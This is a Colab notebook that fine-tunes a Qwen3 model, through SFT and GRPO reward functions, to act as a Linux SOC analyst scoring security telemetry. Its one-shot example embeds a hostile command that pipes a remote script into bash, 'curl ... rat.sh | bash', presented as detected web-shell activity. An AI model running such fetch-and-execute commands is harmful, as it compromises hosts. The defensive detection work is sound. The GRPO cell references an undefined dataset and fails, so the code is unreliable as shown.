# 🛡️ Sys-Scan Logic Engine: The 'Pass 2' Pipeline
**Logic-First Training: SFT Primer + Causal GRPO (Drive Safetensors)**

This pipeline trains your **Drive-hosted model** (`Qwen3_analyst`).
**Targeting:** Merged Safetensors (ignoring GGUF/Shards in the same dir).

**Strategy:**
1.  **Phase 1 (SFT):** Structural Priming (`sft_pass2.jsonl`).
2.  **Phase 2 (GRPO):** Reasoning Optimization (`grpo_pass2.jsonl`).
3.  **Phase 3 (Export):** Merges the 'Logic Adapter' into 16-bit weights and pushes the result to the Hugging Face Hub for deployment.

In [1]:
%%capture
import os
os.environ["UNSLOTH_VLLM_STANDBY"] = "1" # [NEW] Extra 30% context lengths!
if "COLAB_" not in "".join(os.environ.keys()):
    # If you're not in Colab, just use pip install or uv pip install
    !pip install unsloth vllm
else:
    pass # For Colab / Kaggle, we need extra instructions hidden below \/

In [2]:
#@title Colab Extra Install { display-mode: "form" }
%%capture
import os
!pip install --upgrade -qqq uv
if "COLAB_" not in "".join(os.environ.keys()):
    # If you're not in Colab, just use pip install!
    !pip install unsloth vllm
else:
    try: import numpy, PIL; get_numpy = f"numpy=={numpy.__version__}"; get_pil = f"pillow=={PIL.__version__}"
    except: get_numpy = "numpy"; get_pil = "pillow"
    try: import subprocess; is_t4 = "Tesla T4" in str(subprocess.check_output(["nvidia-smi"]))
    except: is_t4 = False
    get_vllm, get_triton = ("vllm==0.9.2", "triton==3.2.0") if is_t4 else ("vllm==0.10.2", "triton")
    !uv pip install -qqq --upgrade \
        unsloth {get_vllm} {get_numpy} {get_pil} torchvision bitsandbytes xformers
    !uv pip install -qqq {get_triton}
!uv pip install transformers==4.56.2
!uv pip install --no-deps trl==0.22.2

In [3]:
# @title 1. Environment Setup
import os
from google.colab import drive

# 1. Mount Drive
if not os.path.exists('/content/drive'):
    drive.mount('/content/drive')

# 2. Login to Hugging Face (Required for pulling the DATASETS)
from huggingface_hub import login
from google.colab import userdata
try:
    login(token=userdata.get('HF_TOKEN'))
except Exception:
    login() # Interactive login if secret not found

In [4]:
# @title 2. Load Safetensors from Google Drive
from unsloth import FastLanguageModel
import torch
import os

# --- DEFINE THE MODEL PATH HERE ---
MODEL_ID = "/content/drive/MyDrive/Qwen3_analyst"

max_seq_length = 2048
dtype = None # Auto detection
load_in_4bit = True

print(f"📂 Loading model from Drive: {MODEL_ID}...")
print("   - Targeting: config.json + model-*.safetensors")
print("   - Ignoring: .gguf and other shards")

# Verify path exists first
if not os.path.exists(MODEL_ID):
    raise FileNotFoundError(f"❌ Could not find model directory: {MODEL_ID}\nPlease check your Drive path.")

# Unsloth defaults to loading 'config.json' and the associated safetensors map
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = MODEL_ID,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
    gpu_memory_utilization = 0.7,
)
print("✅ Drive Model (Safetensors) Loaded Successfully.")

🦥 Unsloth: Will patch your computer to enable 2x faster free finetuning.
INFO 12-28 17:06:37 [__init__.py:216] Automatically detected platform cuda.
🦥 Unsloth Zoo will now patch everything to make training faster!
📂 Loading model from Drive: /content/drive/MyDrive/Qwen3_analyst...
   - Targeting: config.json + model-*.safetensors
   - Ignoring: .gguf and other shards
==((====))==  Unsloth 2025.12.9: Fast Qwen3 patching. Transformers: 4.56.2. vLLM: 0.10.2.
   \\   /|    NVIDIA L4. Num GPUs = 1. Max memory: 22.161 GB. Platform: Linux.
O^O/ \_/ \    Torch: 2.8.0+cu128. CUDA: 8.9. CUDA Toolkit: 12.8. Triton: 3.4.0
\        /    Bfloat16 = TRUE. FA [Xformers = 0.0.32.post1. FA2 = False]
 "-____-"     Free license: http://github.com/unslothai/unsloth
Unsloth: Fast downloading is enabled - ignore downloading bars which are red colored!


Loading checkpoint shards:   0%|          | 0/2 [00:00<?, ?it/s]

✅ Drive Model (Safetensors) Loaded Successfully.


In [5]:
# @title 0. Global Configuration (Linux-Native Protocol)
import json

# REVISED: Strictly Linux-focused reasoning
SYSTEM_PROMPT_DICT = {
    "role": "Tier 3 SOC Analyst & Linux Systems Specialist",
    "objective": "Analyze Linux system telemetry to identify security incidents with high precision.",
    "cognitive_framework": {
        "instruction": "Perform deep reasoning in a <think> block. Validate against Linux standards (FHS, standard PIDs, UID contexts).",
        "steps": [
            "1. Observation: Extract facts (User, PID, Parent Process, Command, Args).",
            "2. Context: Is this standard behavior for a Linux Server? (e.g., 'root' vs 'www-data').",
            "3. Hypothesis: Map to MITRE ATT&CK for Linux (e.g., T1059.004 Unix Shell).",
            "4. Evidence: (+) Anomalous Parent/Child relations. (-) Legitimate Cron/Admin tasks.",
            "5. Verdict: Risk score based on potential system compromise."
        ]
    },
    "response_format": {
        "structure": "<think>...</think><answer>...</answer>",
        "answer_schema": {
            "risk_score": "int (0-100)",
            "severity": "str (LOW|MEDIUM|HIGH|CRITICAL)",
            "category": "str (e.g., 'Web Shell', 'Privilege Escalation')"
        }
    },
    "constraints": [
        "Ignore Windows artifacts (.exe, Registry) unless explicitly Wine-related.",
        "Focus on Linux primitives (syscalls, UIDs, capabilities).",
        "Output strictly valid JSON inside the <answer> tag."
    ]
}

SYSTEM_PROMPT = json.dumps(SYSTEM_PROMPT_DICT, indent=2)

# REVISED ONE-SHOT: Classic RCE Scenario (php-fpm -> sh)
ONE_SHOT = """
User Input:
{
  "title": "Suspicious Web Process",
  "description": "Process 'sh' executed with '-c curl -s http://192.168.1.50/rat.sh | bash'",
  "metadata": {
    "parent": "php-fpm7.4",
    "user": "www-data",
    "uid": 33,
    "cwd": "/var/www/html/uploads"
  }
}

Model Response:
<think>
1. Observation: The 'php-fpm' service (Web Processor) spawned a shell ('sh') which piped a remote script from an IP into 'bash'.
2. Context: The 'www-data' user is a service account for web content. It should NEVER spawn interactive shells or download executables.
3. Hypothesis: Remote Code Execution (RCE) via web vulnerability (MITRE T1190). The command attempts to fetch and execute a reverse shell or beacon (T1059.004).
4. Evidence:
   (+) Parent/Child violation (Web Server -> Shell).
   (+) 'curl | bash' pattern is a hallmark of droppers.
   (+) CWD is a writable upload directory, suggesting a webshell upload.
   (-) No legitimate admin workflow uses 'www-data' to fetch scripts.
5. Verdict: Confirmed RCE. Critical system compromise.
</think>
<answer>
{"risk_score": 100, "severity": "CRITICAL", "category": "Remote Code Execution (RCE)"}
</answer>"""

FULL_PROMPT_STR = f"{SYSTEM_PROMPT}\n\n**EXAMPLE:**{ONE_SHOT}"
print("✅ Protocol Updated (Linux Mode).")

✅ Protocol Updated (Linux Mode).
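
The protocol above fixes a `<think>...</think><answer>...</answer>` layout with a three-field JSON answer. A minimal sketch of how a response could be checked against that schema follows. `parse_response`, `RESPONSE_RE`, and `ALLOWED_SEVERITIES` are hypothetical names introduced here for illustration; they are not part of the notebook.

```python
import json
import re

# Hypothetical helper (not in the notebook): validates a model response
# against the answer_schema described in SYSTEM_PROMPT_DICT.
ALLOWED_SEVERITIES = {"LOW", "MEDIUM", "HIGH", "CRITICAL"}
RESPONSE_RE = re.compile(r"<think>(.*?)</think>\s*<answer>(.*?)</answer>", re.DOTALL)

def parse_response(text):
    """Return (reasoning, answer_dict), or None if the response breaks the protocol."""
    match = RESPONSE_RE.search(text)
    if match is None:
        return None
    try:
        answer = json.loads(match.group(2))
    except json.JSONDecodeError:
        return None
    if not isinstance(answer, dict):
        return None
    score = answer.get("risk_score")
    # bool is a subclass of int, so reject it explicitly.
    if isinstance(score, bool) or not isinstance(score, int) or not 0 <= score <= 100:
        return None
    severity = answer.get("severity")
    if not isinstance(severity, str) or severity not in ALLOWED_SEVERITIES:
        return None
    if not isinstance(answer.get("category"), str):
        return None
    return match.group(1).strip(), answer

sample = (
    "<think>1. Observation: php-fpm spawned sh.</think>\n"
    '<answer>{"risk_score": 100, "severity": "CRITICAL", '
    '"category": "Remote Code Execution (RCE)"}</answer>'
)
parsed = parse_response(sample)
```

A check like this could be run over `pass2_eval.jsonl` completions to count protocol violations separately from scoring errors.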


In [6]:
# @title üì• Download Datasets
from huggingface_hub import hf_hub_download
import shutil
import os

REPO_ID = "jmazz/sys-scan_synthetic_dataset_v2"
FILES = ["sft_pass2.jsonl", "grpo_pass2.jsonl", "pass2_eval.jsonl"]

print("⬇️ pulling datasets from Hugging Face...")

for filename in FILES:
    try:
        # Download from Hub to Cache
        cached_path = hf_hub_download(repo_id=REPO_ID, filename=filename, repo_type="dataset")

        # Copy from Cache to Current Directory (so the loader finds 'sft_pass2.jsonl')
        shutil.copy(cached_path, filename)
        print(f"✅ Ready: {filename}")
    except Exception as e:
        print(f"❌ Failed to download {filename}: {e}")

print("\n🚀 Files are now local. You can proceed with training.")

⬇️ pulling datasets from Hugging Face...
✅ Ready: sft_pass2.jsonl
✅ Ready: grpo_pass2.jsonl
✅ Ready: pass2_eval.jsonl

🚀 Files are now local. You can proceed with training.


In [7]:
# @title üõ†Ô∏è Fix Dataset Schema (The "Nuclear" Option)
import json
from huggingface_hub import hf_hub_download

# 1. Configuration
REPO_ID = "jmazz/sys-scan_synthetic_dataset_v2"
FILES_TO_FIX = ["sft_pass2.jsonl", "grpo_pass2.jsonl"]

def sanitize_and_fix(filename):
    print(f"🔧 Downloading and fixing {filename}...")

    # Download raw file from Hub
    try:
        local_path = hf_hub_download(repo_id=REPO_ID, filename=filename, repo_type="dataset")
    except Exception as e:
        print(f"❌ Failed to download {filename}: {e}")
        return None

    fixed_path = f"fixed_{filename}"

    with open(local_path, 'r', encoding='utf-8') as infile, \
         open(fixed_path, 'w', encoding='utf-8') as outfile:

        for i, line in enumerate(infile):
            try:
                record = json.loads(line)

                # --- THE FIX: Stringify EVERYTHING in Metadata ---
                if "metadata" in record and isinstance(record["metadata"], dict):
                    # Create a new dict to avoid modifying while iterating
                    clean_metadata = {}
                    for k, v in record["metadata"].items():
                        # Force string conversion for ALL values (bools, ints, floats, lists)
                        clean_metadata[k] = str(v)

                    record["metadata"] = clean_metadata

                outfile.write(json.dumps(record) + "\n")
            except Exception as e:
                print(f"⚠️ Skipped malformed line {i}: {e}")

    print(f"✅ Saved robust version to: {fixed_path}")
    return fixed_path

# 2. Run the fix
fixed_sft_path = sanitize_and_fix("sft_pass2.jsonl")
fixed_grpo_path = sanitize_and_fix("grpo_pass2.jsonl")

print("\n🎉 Datasets are now strictly typed. Re-run your loader cells.")

🔧 Downloading and fixing sft_pass2.jsonl...
✅ Saved robust version to: fixed_sft_pass2.jsonl
🔧 Downloading and fixing grpo_pass2.jsonl...
✅ Saved robust version to: fixed_grpo_pass2.jsonl

🎉 Datasets are now strictly typed. Re-run your loader cells.
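
The stringify step above presumably exists because a metadata key whose value type changes from record to record (an integer in one row, a string in the next) makes it hard for a columnar loader to settle on a single schema. The sketch below isolates that transformation on two made-up records; `stringify_metadata` and the sample rows are illustrative and do not come from the dataset.

```python
import json

def stringify_metadata(record):
    """Return a copy of record whose metadata values are all strings."""
    metadata = record.get("metadata")
    if not isinstance(metadata, dict):
        return record
    fixed = dict(record)
    fixed["metadata"] = {key: str(value) for key, value in metadata.items()}
    return fixed

# Made-up rows: "uid" is an int in one record and a string in the other.
raw_lines = [
    '{"title": "a", "metadata": {"uid": 33, "suid": true}}',
    '{"title": "b", "metadata": {"uid": "unknown", "suid": false}}',
]
fixed_records = [stringify_metadata(json.loads(line)) for line in raw_lines]

# After the fix every metadata value has the same type.
value_types = {type(v).__name__ for r in fixed_records for v in r["metadata"].values()}
```

One trade-off worth noting: `str()` on a list or nested dict produces a Python repr rather than JSON, so `json.dumps(value)` may be a better choice if nested values need to be parsed back later.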


In [8]:
# @title 1. Phase 1: Structural Priming (SFT on Your Drive Model)
from unsloth import FastLanguageModel
from trl import SFTTrainer, SFTConfig
from datasets import Dataset
import json
import os
import shutil
import torch  # used below for bf16 detection

# --- CLEANUP ---
if os.path.exists("sft_primer_adapter"): shutil.rmtree("sft_primer_adapter")
if os.path.exists("sft_merged_temp"): shutil.rmtree("sft_merged_temp")

# --- LOAD YOUR PRETRAINED MODEL ---
# Pointing to your specific drive location
MODEL_PATH = "/content/drive/MyDrive/Qwen3_analyst"

print(f"🏗️ Loading Pretrained Analyst from: {MODEL_PATH}...")
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = MODEL_PATH,
    max_seq_length = 4096,
    load_in_4bit = True,
    gpu_memory_utilization = 0.6,
)

model = FastLanguageModel.get_peft_model(
    model,
    r = 64,
    target_modules = ["q_proj", "k_proj", "v_proj", "o_proj", "gate_proj", "up_proj", "down_proj"],
    lora_alpha = 64,
    use_gradient_checkpointing = "unsloth",
    random_state = 3407,
)

# --- DATASET FORMATTING (Injecting the JSON Protocol) ---
def load_sft_data(file_path):
    def gen():
        with open(file_path, 'r') as f:
            for line in f:
                if line.strip():
                    try:
                        row = json.loads(line)
                        # Reconstruct prompt with JSON Protocol
                        user_content = json.dumps({
                            "title": row.get("title"),
                            "description": row.get("description"),
                            "metadata": row.get("metadata")
                        }, indent=2)

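                        target_response = row.get("output") or row.get("response")
                        if not target_response:
                            continue  # Skip rows with no target text to train on

                        full_text = f"<|im_start|>system\n{FULL_PROMPT_STR}<|im_end|>\n" \
                                    f"<|im_start|>user\n{user_content}<|im_end|>\n" \
                                    f"<|im_start|>assistant\n{target_response}<|im_end|>"
                        yield {"text": full_text}
                    except (json.JSONDecodeError, AttributeError):
                        continue  # Skip malformed or non-object JSONL lines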
    return Dataset.from_generator(gen)

print("📂 Loading SFT Dataset...")
dataset_sft = load_sft_data("sft_pass2.jsonl")

# --- TRAIN ---
trainer = SFTTrainer(
    model = model,
    tokenizer = tokenizer,
    train_dataset = dataset_sft,
    dataset_text_field = "text",
    max_seq_length = 4096,
    args = SFTConfig(
        per_device_train_batch_size = 8,
        gradient_accumulation_steps = 4,
        warmup_steps = 10,
        max_steps = 60, # Quick primer to learn the JSON syntax
        learning_rate = 2e-4,
        fp16 = not torch.cuda.is_bf16_supported(),
        bf16 = torch.cuda.is_bf16_supported(),
        logging_steps = 5,
        output_dir = "sft_primer_adapter",
        report_to = "none",
        dataset_num_proc = 2,
    ),
)

print("🚀 Starting SFT Primer on Qwen3_analyst...")
trainer.train()

print("💾 Saving SFT Adapter...")
model.save_pretrained("sft_primer_adapter")
print("✅ SFT Phase Complete.")

🏗️ Loading Pretrained Analyst from: /content/drive/MyDrive/Qwen3_analyst...
==((====))==  Unsloth 2025.12.9: Fast Qwen3 patching. Transformers: 4.56.2. vLLM: 0.10.2.
   \\   /|    NVIDIA L4. Num GPUs = 1. Max memory: 22.161 GB. Platform: Linux.
O^O/ \_/ \    Torch: 2.8.0+cu128. CUDA: 8.9. CUDA Toolkit: 12.8. Triton: 3.4.0
\        /    Bfloat16 = TRUE. FA [Xformers = 0.0.32.post1. FA2 = False]
 "-____-"     Free license: http://github.com/unslothai/unsloth
Unsloth: Fast downloading is enabled - ignore downloading bars which are red colored!


Loading checkpoint shards:   0%|          | 0/2 [00:00<?, ?it/s]

Unsloth 2025.12.9 patched 36 layers with 36 QKV layers, 36 O layers and 36 MLP layers.


📂 Loading SFT Dataset...


Generating train split: 0 examples [00:00, ? examples/s]

Unsloth: Tokenizing ["text"] (num_proc=2):   0%|          | 0/571 [00:00<?, ? examples/s]

🦥 Unsloth: Padding-free auto-enabled, enabling faster training.
🚀 Starting SFT Primer on Qwen3_analyst...


==((====))==  Unsloth - 2x faster free finetuning | Num GPUs used = 1
   \\   /|    Num examples = 571 | Num Epochs = 4 | Total steps = 60
O^O/ \_/ \    Batch size per device = 8 | Gradient accumulation steps = 4
\        /    Data Parallel GPUs = 1 | Total batch size (8 x 4 x 1) = 32
 "-____-"     Trainable parameters = 132,120,576 of 4,154,588,672 (3.18% trained)


Unsloth: Will smartly offload gradients to save VRAM!


Step,Training Loss
5,2.3045
10,1.4149
15,0.6214
20,0.2942
25,0.2324
30,0.1897
35,0.1612
40,0.1455
45,0.1405
50,0.1199


💾 Saving SFT Adapter...
✅ SFT Phase Complete.
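
The banner above reports 571 examples, a total batch size of 32, 60 steps, and "Num Epochs = 4". The arithmetic below is a rough reconstruction of how those figures relate, under the assumption that a partial final batch still counts as a step; it is not taken from the trainer's source.

```python
import math

# Values copied from the SFTConfig and the training banner above.
num_examples = 571
per_device_batch = 8
grad_accum = 4
max_steps = 60

effective_batch = per_device_batch * grad_accum               # examples per optimizer step
micro_batches = math.ceil(num_examples / per_device_batch)    # dataloader batches per epoch
steps_per_epoch = math.ceil(micro_batches / grad_accum)       # optimizer steps per epoch
epochs_touched = math.ceil(max_steps / steps_per_epoch)       # epochs started within max_steps
passes_over_data = max_steps * effective_batch / num_examples # fractional passes over the data

print(effective_batch, steps_per_epoch, epochs_touched, round(passes_over_data, 2))
```

So the 60-step primer sees each example a little more than three times, and the fourth epoch is only partly completed.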


In [9]:
# @title 2. The Bridge: Merge SFT Adapter
import gc
import torch

# Clean memory from Phase 1
del model, tokenizer, trainer
gc.collect()
torch.cuda.empty_cache()

print("🔄 Merging SFT Adapter into Base...")

# Load Adapter
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = "sft_primer_adapter",
    max_seq_length = 4096,
    load_in_4bit = True,
)

# Merge to Disk
model.save_pretrained_merged(
    "sft_merged_temp",
    tokenizer,
    save_method = "merged_16bit",
)

# Cleanup
del model, tokenizer
gc.collect()
torch.cuda.empty_cache()
print("✅ Merge Complete. Ready for GRPO.")

🔄 Merging SFT Adapter into Base...
==((====))==  Unsloth 2025.12.9: Fast Qwen3 patching. Transformers: 4.56.2. vLLM: 0.10.2.
   \\   /|    NVIDIA L4. Num GPUs = 1. Max memory: 22.161 GB. Platform: Linux.
O^O/ \_/ \    Torch: 2.8.0+cu128. CUDA: 8.9. CUDA Toolkit: 12.8. Triton: 3.4.0
\        /    Bfloat16 = TRUE. FA [Xformers = 0.0.32.post1. FA2 = False]
 "-____-"     Free license: http://github.com/unslothai/unsloth
Unsloth: Fast downloading is enabled - ignore downloading bars which are red colored!


Loading checkpoint shards:   0%|          | 0/2 [00:00<?, ?it/s]

Detected local model directory: /content/drive/MyDrive/Qwen3_analyst
Found HuggingFace hub cache directory: /root/.cache/huggingface/hub


Unsloth: Preparing safetensor model files:  50%|█████     | 1/2 [00:13<00:13, 13.26s/it]

Copied model-00001-of-00002.safetensors from local model directory


Unsloth: Preparing safetensor model files: 100%|██████████| 2/2 [00:21<00:00, 10.78s/it]


Copied model-00002-of-00002.safetensors from local model directory


Unsloth: Merging weights into 16bit: 100%|██████████| 2/2 [00:25<00:00, 12.93s/it]


Unsloth: Merge process complete. Saved to `/content/sft_merged_temp`
✅ Merge Complete. Ready for GRPO.


In [10]:
# @title 3. Phase 2: Logic Optimization (GRPO)
from trl import GRPOConfig, GRPOTrainer
from unsloth import FastLanguageModel
import json  # used by risk_math_reward
import re

# --- REWARDS ---
def format_reward(completions, **kwargs):
    # Check that a <think> block is followed by an <answer> block; re.search tolerates extra text around them
    pattern = r"<think>.*?</think>\s*<answer>.*?</answer>"
    return [1.0 if re.search(pattern, c[0]["content"], re.DOTALL) else 0.0 for c in completions]

def analytical_depth_reward(completions, **kwargs):
    # Check for the step keywords listed in the system prompt's cognitive_framework
    keywords = ["observation", "context", "hypothesis", "evidence", "verdict"]
    rewards = []
    for c in completions:
        match = re.search(r"<think>(.*?)</think>", c[0]["content"], re.DOTALL | re.IGNORECASE)
        if match:
            score = sum(0.2 for k in keywords if k in match.group(1).lower())
            rewards.append(min(1.0, score))
        else:
            rewards.append(0.0)
    return rewards

def risk_math_reward(completions, answer, **kwargs):
    rewards = []
    for c, gt in zip(completions, answer):
        try:
            ans_match = re.search(r"<answer>(.*?)</answer>", c[0]["content"], re.DOTALL)
            if ans_match:
                pred = json.loads(ans_match.group(1)).get("risk_score", 0)
                target = json.loads(gt).get("risk_score", 0)
                diff = abs(pred - target)
                if diff == 0: rewards.append(1.0)
                elif diff <= 5: rewards.append(0.5)
                else: rewards.append(0.0)
            else:
                rewards.append(0.0)
        except Exception:  # malformed JSON or a non-numeric risk_score
            rewards.append(0.0)
    return rewards

# --- LOAD MERGED MODEL ---
print("♻️ Loading Merged Model for RL...")
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = "sft_merged_temp",
    max_seq_length = 4096,
    load_in_4bit = True,
    fast_inference = True, # Enable vLLM
    gpu_memory_utilization = 0.6,
    enforce_eager = True, # Stability fix
)

model = FastLanguageModel.get_peft_model(
    model, r=64,
    target_modules=["q_proj", "k_proj", "v_proj", "o_proj", "gate_proj", "up_proj", "down_proj"],
    lora_alpha=64, use_gradient_checkpointing="unsloth", random_state=3407
)

# NOTE: `dataset_grpo` must be defined before the trainer below is built. Based on the
# reward functions above, it needs a conversational `prompt` column and an `answer`
# column holding a JSON string with a `risk_score` key.



# --- EXECUTE ---
trainer = GRPOTrainer(
    model = model,
    processing_class = tokenizer,
    reward_funcs = [format_reward, analytical_depth_reward, risk_math_reward],
    args = GRPOConfig(
        output_dir = "final_logic_adapter",
        learning_rate = 5e-6,
        logging_steps = 1,
        bf16 = True,
        per_device_train_batch_size = 1,
        gradient_accumulation_steps = 4,
        num_generations = 4, # Optimized group size
        max_prompt_length = 2048,
        max_completion_length = 768,
        max_steps = 300,
        report_to = "none",
        use_vllm = True,
    ),
    train_dataset = dataset_grpo,
)

print("🚀 Starting End-to-End GRPO...")
trainer.train()
model.save_pretrained("final_logic_adapter")
print("✅ DONE.")

♻️ Loading Merged Model for RL...
INFO 12-28 17:28:18 [vllm_utils.py:702] Unsloth: Patching vLLM v1 graph capture
INFO 12-28 17:28:18 [vllm_utils.py:732] Unsloth: Patching vLLM v0 graph capture
==((====))==  Unsloth 2025.12.9: Fast Qwen3 patching. Transformers: 4.56.2. vLLM: 0.10.2.
   \\   /|    NVIDIA L4. Num GPUs = 1. Max memory: 22.161 GB. Platform: Linux.
O^O/ \_/ \    Torch: 2.8.0+cu128. CUDA: 8.9. CUDA Toolkit: 12.8. Triton: 3.4.0
\        /    Bfloat16 = TRUE. FA [Xformers = 0.0.32.post1. FA2 = False]
 "-____-"     Free license: http://github.com/unslothai/unsloth
Unsloth: Fast downloading is enabled - ignore downloading bars which are red colored!
Unsloth: Standby mode is enabled. Changing `gpu_memory_utilization` to 0.875.
Unsloth: vLLM loading sft_merged_temp with actual GPU utilization = 58.25%
Unsloth: Your GPU has CUDA compute capability 8.9 with VRAM = 22.16 GB.
Unsloth: Using conservativeness = 1.0. Chunked prefill tokens = 4096. Num Sequences = 48.
Unsloth: vLLM's 

`torch_dtype` is deprecated! Use `dtype` instead!


INFO 12-28 17:28:41 [__init__.py:1815] Using max model len 4096
INFO 12-28 17:28:43 [scheduler.py:222] Chunked prefill is enabled with max_num_batched_tokens=4096.
Unsloth: vLLM Bitsandbytes config using kwargs = {'load_in_8bit': False, 'load_in_4bit': True, 'bnb_4bit_compute_dtype': 'bfloat16', 'bnb_4bit_quant_storage': 'uint8', 'bnb_4bit_quant_type': 'fp4', 'bnb_4bit_use_double_quant': False, 'llm_int8_enable_fp32_cpu_offload': False, 'llm_int8_has_fp16_weight': False, 'llm_int8_skip_modules': [], 'llm_int8_threshold': 6.0}
INFO 12-28 17:28:43 [__init__.py:3400] Cudagraph is disabled under eager mode
INFO 12-28 17:28:44 [core.py:76] Initializing a V1 LLM engine (v0.10.2) with config: model='sft_merged_temp', speculative_config=None, tokenizer='sft_merged_temp', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, tokenizer_revision=None, trust_remote_code=False, dtype=torch.bfloat16, max_seq_len=4096, download_dir=None, load_format=bitsandbytes, tensor_parallel_size=1, pipe

Loading safetensors checkpoint shards:   0% Completed | 0/2 [00:00<?, ?it/s]


INFO 12-28 17:28:48 [punica_selector.py:19] Using PunicaWrapperGPU.
INFO 12-28 17:28:49 [gpu_model_runner.py:2392] Model loading took 2.8025 GiB and 2.856138 seconds
INFO 12-28 17:29:03 [backends.py:539] Using cache directory: /root/.cache/vllm/torch_compile_cache/9e4194d584/rank_0_0/backbone for vLLM's torch.compile
INFO 12-28 17:29:03 [backends.py:550] Dynamo bytecode transform time: 12.87 s


Unsloth: Compiling kernels: 100%|██████████| 7/7 [00:00<00:00, 10.42it/s, triton_poi_fused_view_6]

INFO 12-28 17:29:09 [backends.py:194] Cache the graph for dynamic shape for later use



Unsloth: Compiling kernels: 100%|██████████| 11/11 [00:00<00:00, 19.01it/s, triton_poi_fused_view_10]

INFO 12-28 17:29:58 [backends.py:215] Compiling a graph for dynamic shape takes 52.69 s
INFO 12-28 17:30:54 [monitor.py:34] torch.compile takes 65.56 s in total
INFO 12-28 17:30:56 [gpu_worker.py:298] Available KV cache memory: 9.67 GiB
INFO 12-28 17:30:57 [kv_cache_utils.py:864] GPU KV cache size: 70,416 tokens
INFO 12-28 17:30:57 [kv_cache_utils.py:868] Maximum concurrency for 4,096 tokens per request: 17.19x
INFO 12-28 17:30:57 [gpu_worker.py:391] Free memory on device (14.75/22.16 GiB) on startup. Desired GPU memory utilization is (0.5825155748224938, 12.91 GiB). Actual usage is 2.8 GiB for weight, 0.43 GiB for peak activation, 0.01 GiB for non-torch memory, and 0.0 GiB for CUDAGraph memory. Replace gpu_memory_utilization config with `--kv-cache-memory=10227352064` to fit into requested memory, or `--kv-cache-memory=12207505920` to fully utilize gpu memory. Current kv cache memory in use is 10384638464 bytes.
INFO 12-28 17:30:58 [core.py:218] init engine (profile, create kv cache, 

Loading checkpoint shards:   0%|          | 0/2 [00:00<?, ?it/s]

Some weights of Qwen3ForCausalLM were not initialized from the model checkpoint at sft_merged_temp and are newly initialized: ['lm_head.weight']
You should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.


Performing substitution for additional_keys=set()
Unsloth: Just some info: will skip parsing ['pre_feedforward_layernorm', 'cross_attn_input_layernorm', 'input_layernorm', 'layer_norm2', 'post_layernorm', 'q_norm', 'cross_attn_post_attention_layernorm', 'norm2', 'ffn_norm', 'post_attention_layernorm', 'norm1', 'norm', 'post_feedforward_layernorm', 'layer_norm1', 'attention_norm', 'k_norm']


Generating train split: 0 examples [00:00, ? examples/s]

Generating train split: 0 examples [00:00, ? examples/s]

DatasetGenerationError: An error occurred while generating the dataset
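
The GRPO cell above passes `dataset_grpo` to the trainer, but the code shown never builds it. A minimal sketch of one way to build the rows follows, mirroring the SFT loader's prompt construction. The `risk_score` ground-truth field and the function name `build_grpo_rows` are assumptions; the real key names in `grpo_pass2.jsonl` may differ and should be checked first.

```python
import json

def build_grpo_rows(lines, system_prompt):
    """Turn JSONL lines into rows with a chat-style `prompt` and a JSON `answer` string."""
    rows = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        record = json.loads(line)
        # Serialize the user payload to a string so every row has the same flat shape.
        user_content = json.dumps(
            {
                "title": record.get("title"),
                "description": record.get("description"),
                "metadata": record.get("metadata"),
            },
            indent=2,
        )
        rows.append({
            "prompt": [
                {"role": "system", "content": system_prompt},
                {"role": "user", "content": user_content},
            ],
            # ASSUMPTION: the ground truth lives under "risk_score" in each record.
            "answer": json.dumps({"risk_score": record.get("risk_score", 0)}),
        })
    return rows

demo_lines = [
    '{"title": "t", "description": "d", "metadata": {"uid": "33"}, "risk_score": 90}',
    "",
]
demo_rows = build_grpo_rows(demo_lines, "SYSTEM PROMPT PLACEHOLDER")
```

In the notebook, the resulting list could be wrapped with `Dataset.from_list(...)` from `datasets`, with `FULL_PROMPT_STR` as the system prompt, and assigned to `dataset_grpo`. Because each row holds only strings and a uniform list of messages, varying metadata keys no longer affect the dataset schema.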

In [None]:
# @title 5. Export
# Merge the final adapter into 16-bit weights, save them locally, and push them to the Hub
if os.path.exists("final_logic_adapter"):
    model.save_pretrained_merged("merged_model", tokenizer, save_method="merged_16bit")
    model.push_to_hub_merged("jmazz/sys-scan-logic-v1", tokenizer, save_method="merged_16bit", token=userdata.get('HF_TOKEN'))
